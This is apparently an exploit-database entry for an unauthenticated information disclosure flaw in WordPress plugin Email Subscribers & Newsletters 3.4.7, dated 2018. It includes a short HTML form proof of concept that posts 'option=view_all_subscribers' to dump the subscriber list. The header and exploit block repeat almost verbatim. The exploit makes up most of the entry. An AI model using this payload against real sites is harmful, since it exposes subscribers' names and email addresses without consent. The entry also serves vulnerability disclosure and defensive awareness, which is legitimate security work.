# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage:
# Software Link:
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed the vulnerability that allows an unauthenticated user to download the entire subscriber list with names and e-mail addresses.
Exploit:
<form action=" " method="post">
<input type="text" name="option" value="view_all_subscribers" />
<input type="submit" value="Exploit" />
</form>
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage:
# Software Link:
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed the vulnerability that allows an unauthenticated user to download the entire subscriber list with names and e-mail addresses.
Exploit:
<form action=" " method="post">
<input type="text" name="option" value="view_all_subscribers" />
<input type="submit" value="Exploit" />
</form>